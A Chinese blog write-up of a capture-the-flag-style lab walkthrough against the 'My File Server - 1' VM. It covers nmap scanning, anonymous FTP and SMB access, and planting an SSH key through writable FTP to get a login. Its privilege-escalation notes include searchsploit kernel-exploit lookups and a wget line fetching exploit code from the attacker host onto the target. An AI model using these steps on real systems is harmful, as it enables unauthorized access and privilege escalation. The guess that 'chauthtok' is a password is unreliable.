MyFileServer
MyFileServer
信息收集
主机发现,扫描整个c段
1 | nmap -sn 192.168.31.0/24 |
确定靶机地址为192.168.31.60
全端口扫描
1 | nmap -sT --min-rate=10000 -p- 192.168.31.60 -oA nmapscan/ports |
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
└─# nmap -sT -p- --min-rate=10000 192.168.31.60 -oA nmapscan/ports
Starting Nmap 7.93 ( https://nmap.org ) at 2023-10-16 10:25 CST
Nmap scan report for fileserver (192.168.31.60)
Host is up (0.00072s latency).
Not shown: 64504 filtered tcp ports (no-response), 19 filtered tcp ports (host-unreach), 1004 closed tcp ports (conn-refused)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
445/tcp open microsoft-ds
2049/tcp open nfs
2121/tcp open ccproxy-ftp
20048/tcp open mountd
MAC Address: 00:0C:29:D7:60:69 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 13.28 seconds
对扫描结果进行简单的处理
打印全部端口
1 | grep open nmapscan/ports.nmap | awk -F '/' '{print $1}' |
1 | grep open nmapscan/prots.nmap | awk -F '/' '{print $1}' | paste -sd ',' |
2
3
└─# grep 'open' nmapscan/ports.nmap | awk -F '/' '{print $1}' | paste -sd ','
21,22,80,111,445,2049,2121,20048这样能得到一个方便后续操作的参数格式
对端口服务进行详细扫描
1 | nmap -sT -sV -O -sC -p21,22,80,111,445,2049,2121,20048 192.168.31.60 -oA /home/lkk/nmapscan/detail |
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
└─# nmap -sT -sV -O -sC -p21,22,80,111,445,2049,2121,20048 192.168.31.60 -oA /home/lkk/nmapscan/detail
Starting Nmap 7.93 ( https://nmap.org ) at 2023-10-16 11:01 CST
Nmap scan report for fileserver (192.168.31.60)
Host is up (0.00046s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.31.19
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.2 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx 3 0 0 16 Feb 19 2020 pub [NSE: writeable]
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 75fa37d1624a15877e2183b92fff0493 (RSA)
| 256 b8db2ccae270c3eb9aa8cc0ea21c686b (ECDSA)
|_ 256 66a31b55cac2518441217f774045d49f (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS))
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: My File Server
|_http-server-header: Apache/2.4.6 (CentOS)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100003 3,4 2049/udp nfs
| 100003 3,4 2049/udp6 nfs
| 100005 1,2,3 20048/tcp mountd
| 100005 1,2,3 20048/tcp6 mountd
| 100005 1,2,3 20048/udp mountd
| 100005 1,2,3 20048/udp6 mountd
| 100021 1,3,4 36541/udp nlockmgr
| 100021 1,3,4 41202/udp6 nlockmgr
| 100021 1,3,4 51508/tcp6 nlockmgr
| 100021 1,3,4 54552/tcp nlockmgr
| 100024 1 44568/tcp6 status
| 100024 1 50635/tcp status
| 100024 1 55325/udp status
| 100024 1 58523/udp6 status
| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_acl
445/tcp open netbios-ssn Samba smbd 4.9.1 (workgroup: SAMBA)
2049/tcp open nfs_acl 3 (RPC #100227)
2121/tcp open ftp ProFTPD 1.3.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: ERROR
20048/tcp open mountd 1-3 (RPC #100005)
MAC Address: 00:0C:29:D7:60:69 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10, Linux 2.6.32 - 3.13, Linux 3.10, Linux 3.4 - 3.10
Network Distance: 1 hop
Service Info: OS: Unix
Host script results:
|_clock-skew: mean: 6h10m00s, deviation: 3h10m30s, median: 7h59m59s
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2023-10-16T11:01:36
|_ start_date: N/A
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.9.1)
| Computer name: localhost
| NetBIOS computer name: FILESERVER\x00
| Domain name: \x00
| FQDN: localhost
|_ System time: 2023-10-16T16:31:34+05:30
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.51 seconds
- 21 ftp vsftpd 3.0.2 允许匿名登录,有一个可写的pub目录
- 22 ssh oepnshh 7.4 主机密钥类型有三种(RSA,ECDSA,ED25519)
- 80 apache服务,centos系统
- 111 rpc
- 445 samba
- 2049、2121、20048都是用rpc协议运行的服务(见111端口扫描结果)
udp扫描
1 | nmap -sU -top-ports 20 192.168.31.60 -oA nmapscan/udp |
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
└─# nmap -sU -top-ports 20 192.168.31.60 -oA nmapscan/udp
Starting Nmap 7.93 ( https://nmap.org ) at 2023-10-16 10:30 CST
Nmap scan report for fileserver (192.168.31.60)
Host is up (0.00042s latency).
PORT STATE SERVICE
53/udp filtered domain
67/udp filtered dhcps
68/udp filtered dhcpc
69/udp open|filtered tftp
123/udp open|filtered ntp
135/udp filtered msrpc
137/udp filtered netbios-ns
138/udp open|filtered netbios-dgm
139/udp open|filtered netbios-ssn
161/udp filtered snmp
162/udp open|filtered snmptrap
445/udp open|filtered microsoft-ds
500/udp filtered isakmp
514/udp filtered syslog
520/udp filtered route
631/udp open|filtered ipp
1434/udp filtered ms-sql-m
1900/udp filtered upnp
4500/udp open|filtered nat-t-ike
49152/udp open|filtered unknown
MAC Address: 00:0C:29:D7:60:69 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 8.18 seconds
默认脚本漏洞扫描
1 | nmap -script=vuln 192.168.31.60 -p21,22,80,111,445,2049,2121,20048 -oA nmapscan/vuln |
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
└─# nmap -script=vuln 192.168.31.60 -p21,22,80,111,445,2049,2121,20048 -oA nmapscan/vuln
Starting Nmap 7.93 ( https://nmap.org ) at 2023-10-16 10:52 CST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for fileserver (192.168.31.60)
Host is up (0.00032s latency).
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
|_http-trace: TRACE is enabled
| http-enum:
|_ /icons/: Potentially interesting folder w/ directory listing
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
111/tcp open rpcbind
445/tcp open microsoft-ds
2049/tcp open nfs
2121/tcp open ccproxy-ftp
20048/tcp open mountd
MAC Address: 00:0C:29:D7:60:69 (VMware)
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: false
| smb-vuln-regsvc-dos:
| VULNERABLE:
| Service regsvc in Microsoft Windows systems vulnerable to denial of service
| State: VULNERABLE
| The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
| pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
| while working on smb-enum-sessions.
|_
Nmap done: 1 IP address (1 host up) scanned in 68.01 seconds
- 80端口没有新的信息发现
- samba有可能有拒绝服务攻击,在渗透测试中不考虑这种方法
没有特别值得注意的信息。
信息分析及渗透
- 21端口和2121端口 ftp 允许匿名登录,可以尝试登录获取其中文件
- 445 samba服务 可以用smbmap跑一下
- 111、2049、20048
- 80 http服务
- 22 ssh服务
尝试ftp匿名登录
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
└─# ftp 192.168.31.60
Connected to 192.168.31.60.
220 (vsFTPd 3.0.2)
Name (192.168.31.60:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> binary
200 Switching to Binary mode.
ftp> ls
229 Entering Extended Passive Mode (|||5821|).
150 Here comes the directory listing.
drwxrwxrwx 3 0 0 16 Feb 19 2020 pub
226 Directory send OK.
ftp> cd pub
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||5926|).
150 Here comes the directory listing.
drwxr-xr-x 9 0 0 4096 Feb 19 2020 log
226 Directory send OK.
ftp> pwd
Remote directory: /pub
ftp> cd log
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||5478|).
150 Here comes the directory listing.
drwxr-xr-x 2 0 0 4096 Feb 19 2020 anaconda
drwxr-x--- 2 0 0 22 Feb 19 2020 audit
-rw-r--r-- 1 0 0 7033 Feb 19 2020 boot.log
-rw------- 1 0 0 10752 Feb 19 2020 btmp
-rw-r--r-- 1 0 0 9161 Feb 19 2020 cron
-rw-r--r-- 1 0 0 31971 Feb 19 2020 dmesg
-rw-r--r-- 1 0 0 31971 Feb 19 2020 dmesg.old
drwxr-xr-x 2 0 0 6 Feb 19 2020 glusterfs
drwx------ 2 0 0 39 Feb 19 2020 httpd
-rw-r--r-- 1 0 0 292584 Feb 19 2020 lastlog
-rw------- 1 0 0 3764 Feb 19 2020 maillog
-rw------- 1 0 0 1423423 Feb 19 2020 messages
drwx------ 2 0 0 6 Feb 19 2020 ppp
drwx------ 4 0 0 43 Feb 19 2020 samba
-rw------- 1 0 0 63142 Feb 19 2020 secure
-rw------- 1 0 0 0 Feb 19 2020 spooler
-rw------- 1 0 0 0 Feb 19 2020 tallylog
drwxr-xr-x 2 0 0 22 Feb 19 2020 tuned
-rw-r--r-- 1 0 0 58752 Feb 19 2020 wtmp
-rw------- 1 0 0 100 Feb 19 2020 xferlog
-rw------- 1 0 0 18076 Feb 19 2020 yum.log
226 Directory send OK.
ftp>发现一些文件(基本都是日志文件),打算通通下载下来看一遍
发现不让下载,可能是目录的权限问题
还有一个ftp运行在2121端口,匿名登录后发现和21端口并无区别。
尝试smb
先使用smbmap探测一下
1 | smbmap -H 192.168.31.60 |
2
3
4
5
6
7
8
9
└─# smbmap -H 192.168.31.60
[+] IP: 192.168.31.60:445 Name: fileserver
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
smbdata READ, WRITE smbdata
smbuser NO ACCESS smbuser
IPC$ NO ACCESS IPC Service (Samba 4.9.1)发现smbdata、smbuser。其中smbdata可读写,smbuser无访问权限
1 | smbclient //192.168.31.60/smbdata |
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
└─# smbclient //192.168.31.60/smbdata
Password for [WORKGROUP\root]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Oct 16 20:22:13 2023
.. D 0 Tue Feb 18 19:47:54 2020
anaconda D 0 Tue Feb 18 19:48:15 2020
audit D 0 Tue Feb 18 19:48:15 2020
boot.log N 6120 Tue Feb 18 19:48:16 2020
btmp N 384 Tue Feb 18 19:48:16 2020
cron N 4813 Tue Feb 18 19:48:16 2020
dmesg N 31389 Tue Feb 18 19:48:16 2020
dmesg.old N 31389 Tue Feb 18 19:48:16 2020
glusterfs D 0 Tue Feb 18 19:48:16 2020
lastlog N 292292 Tue Feb 18 19:48:16 2020
maillog N 1982 Tue Feb 18 19:48:16 2020
messages N 684379 Tue Feb 18 19:48:17 2020
ppp D 0 Tue Feb 18 19:48:17 2020
samba D 0 Tue Feb 18 19:48:17 2020
secure N 11937 Tue Feb 18 19:48:17 2020
spooler N 0 Tue Feb 18 19:48:17 2020
tallylog N 0 Tue Feb 18 19:48:17 2020
tuned D 0 Tue Feb 18 19:48:17 2020
wtmp N 25728 Tue Feb 18 19:48:17 2020
xferlog N 100 Tue Feb 18 19:48:17 2020
yum.log N 10915 Tue Feb 18 19:48:17 2020
sshd_config N 3906 Wed Feb 19 15:46:38 2020
19976192 blocks of size 1024. 18151588 blocks available
smb: \> prompt
smb: \> mget * *.*发现比之前的ftp多了个sshd_config文件,重点关注这个
先把所有文件拷贝下来
对下载下来的文件进行分析
把下载下来的文件都看了一遍。其中cron是自动任务的内容,没有明显的令人感兴趣的信息。
ssh_config文件上面有关于ssh公钥存放位置的配置:
2
3
4
5
# The default is to check both .ssh/authorized_keys and .ssh/authorized_keys2
# but this is overridden so installations will only check .ssh/authorized_keys
AuthorizedKeysFile .ssh/authorized_keys
secure文件中有一些关于组、用户的操作,其中发现这样的内容
Feb 18 17:16:39 localhost useradd[2389]: new group: name=smbuser, GID=1000
Feb 18 17:16:39 localhost useradd[2389]: new user: name=smbuser, UID=1000, GID=1000, home=/home/smbuser, shell=/bin/bash
Feb 18 17:17:09 localhost passwd: pam_unix(passwd:chauthtok): password changed for smbuser
chauthtok 很可能是用户 smbuser的密码。
本来想着尝试smb登录smbuser,想起来smbuser的权限是no access,此路不通
尝试ftp登录smbuser
2
3
4
5
6
7
8
9
└─# ftp 192.168.31.60
Connected to 192.168.31.60.
220 (vsFTPd 3.0.2)
Name (192.168.31.60:root): smbuser
331 Please specify the password.
Password:
530 Login incorrect.
ftp: Login failed失败,看来没这么简单。
尝试nfs
使用showmount命令显示nfs服务器的共享信息
1 | showmount -e 192.168.31.60 |
2
3
4
└─# showmount -e 192.168.31.60
Export list for 192.168.31.60:
/smbdata 192.168.56.0/24限制56网段的用户才能连接。靶机与攻击机处于同一个局域网,可以尝试把本地的ip网段改为56进行连接。
而smbdata这个目录先前已经看过一个同名的了,先不尝试连接。
尝试80 http服务
超链接指向一个外网的网址,ctrl+u查看源码无有效信息。
尝试目录爆破
1 | gobuster dir -u http://192.168.31.60 -x txt,zip,rar,sql -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt |
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
└─# gobuster dir -u http://192.168.31.60 -x txt,zip,rar,sql -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.31.60
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Extensions: txt,zip,rar,sql
[+] Timeout: 10s
===============================================================
2023/10/16 16:06:24 Starting gobuster in directory enumeration mode
===============================================================
/readme.txt (Status: 200) [Size: 25]
Progress: 1099769 / 1102805 (99.72%)
===============================================================
2023/10/16 16:09:51 Finished
===============================================================爆破出readme.txt,访问一下
猜测这个是smbuser 的密码,再次尝试ftp登录
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
└─# ftp 192.168.31.60
Connected to 192.168.31.60.
220 (vsFTPd 3.0.2)
Name (192.168.31.60:root): smbuser
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||5093|).
150 Here comes the directory listing.
226 Directory send OK.
ftp> pwd
Remote directory: /home/smbuser
ftp> ls -alhi
229 Entering Extended Passive Mode (|||5393|).
150 Here comes the directory listing.
drwx------ 2 1000 1000 94 Oct 15 12:40 .
drwxr-xr-x 3 0 0 20 Feb 19 2020 ..
-rw------- 1 1000 1000 27 Feb 20 2020 .bash_history
-rw-r--r-- 1 1000 1000 18 Mar 05 2015 .bash_logout
-rw-r--r-- 1 1000 1000 193 Mar 05 2015 .bash_profile
-rw-r--r-- 1 1000 1000 231 Mar 05 2015 .bashrc
-rw------- 1 1000 1000 589 Oct 15 12:40 .viminfo
226 Directory send OK.这次成功登录,发现这个目录是smbuser的家目录。而且有读写权限。
见”drwx—— 2 1000 1000 94 Oct 15 12:40 .“此记录
前面信息收集时发现ssh只允许使用密钥连接,ssh公钥存放的位置为默认位置(.ssh/authorized_keys)
而我们拥有了smbuser用户家目录的读写权限,那么可以尝试制作公私钥密码对,把公钥上传至家目录/.ssh/authorized_keys 进行密钥连接。
尝试ssh
生成公钥私钥对
1 | ssh-keygen |
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
└─# ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): sshkey
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in sshkey
Your public key has been saved in sshkey.pub
The key fingerprint is:
SHA256:rrSgL96sprCBBVNUbf9ZVriglWLCSrwZsmevm0UEfMA root@lkk
The key's randomart image is:
+---[RSA 3072]----+
| .o=++ . . |
| .. E.* o + . . |
|o + B.+ + . o |
| o. *. o + |
| .o .. S. + |
|.. ... o |
|+ ..o . |
|.oo+.= o |
|o+++*.o |
+----[SHA256]-----+
将公钥上传至指定位置
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
257 "/home/smbuser/.ssh" created
ftp> cd ./ssh
550 Failed to change directory.
ftp> cd ./.ssh
250 Directory successfully changed.
ftp> put ../sshkeygen/sshkey.pub authorized_keys
local: ../sshkeygen/sshkey.pub remote: authorized_keys
229 Entering Extended Passive Mode (|||5107|).
150 Ok to send data.
100% |**********************************************************************| 562 1.60 MiB/s 00:00 ETA
226 Transfer complete.
562 bytes sent in 00:00 (548.27 KiB/s)
ftp> ls
229 Entering Extended Passive Mode (|||5376|).
150 Here comes the directory listing.
-rw-r--r-- 1 1000 1000 562 Oct 16 16:10 authorized_keys
226 Directory send OK.
尝试连接
1 | ssh -i |
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
└─# ssh -i sshkey smbuser@192.168.31.60
The authenticity of host '192.168.31.60 (192.168.31.60)' can't be established.
ED25519 key fingerprint is SHA256:ccn0TgE4/OXtSpg3oMO2gVNYXrps4Zi+XcBgaDZnW78.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yew
Please type 'yes', 'no' or the fingerprint: yes
Warning: Permanently added '192.168.31.60' (ED25519) to the list of known hosts.
##############################################################################################
# Armour Infosec #
# --------- www.armourinfosec.com ------------ #
# My File Server - 1 #
# Designed By :- Akanksha Sachin Verma #
# Twitter :- @akankshavermasv #
##############################################################################################
Last login: Sun Oct 15 18:09:30 2023
[smbuser@fileserver ~]$ exit登录成功
权限提升
查看用户名
1 | whoami |
查看系统信息
1 | uname -a |
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
└─# ssh -i sshkey smbuser@192.168.31.60
##############################################################################################
# Armour Infosec #
# --------- www.armourinfosec.com ------------ #
# My File Server - 1 #
# Designed By :- Akanksha Sachin Verma #
# Twitter :- @akankshavermasv #
##############################################################################################
Last login: Mon Oct 16 21:48:22 2023 from lkk
[smbuser@fileserver ~]$ whoami
smbuser
[smbuser@fileserver ~]$ uname -a
Linux fileserver 3.10.0-229.el7.x86_64 #1 SMP Fri Mar 6 11:36:42 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
[smbuser@fileserver ~]$内核版本3.10 版本不高 注意到dirty cow(脏牛)漏洞的范围是2.6.22 —— 4.8.3
权限提升这步一般利用现成的脚本
常用的命令:
查找脚本并下载
2
3
>searchsploit kernel 3.10 privilege escalation
>searchsploit -m 33516.c本地开启80端口,监听网卡0
操控靶机下载攻击机的脚本
2
>wget http://192.168.31.19/33516.c借助linpeas.sh提示工具
- 先把linpeas.sh上传至靶机
- 然后编译运行,看suggest部分的推荐
- 攻击机使用searchsploit获取对应脚本
常用的脚本依赖库有 -pthread -lcrypt
拿下
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Enderman_1's blog!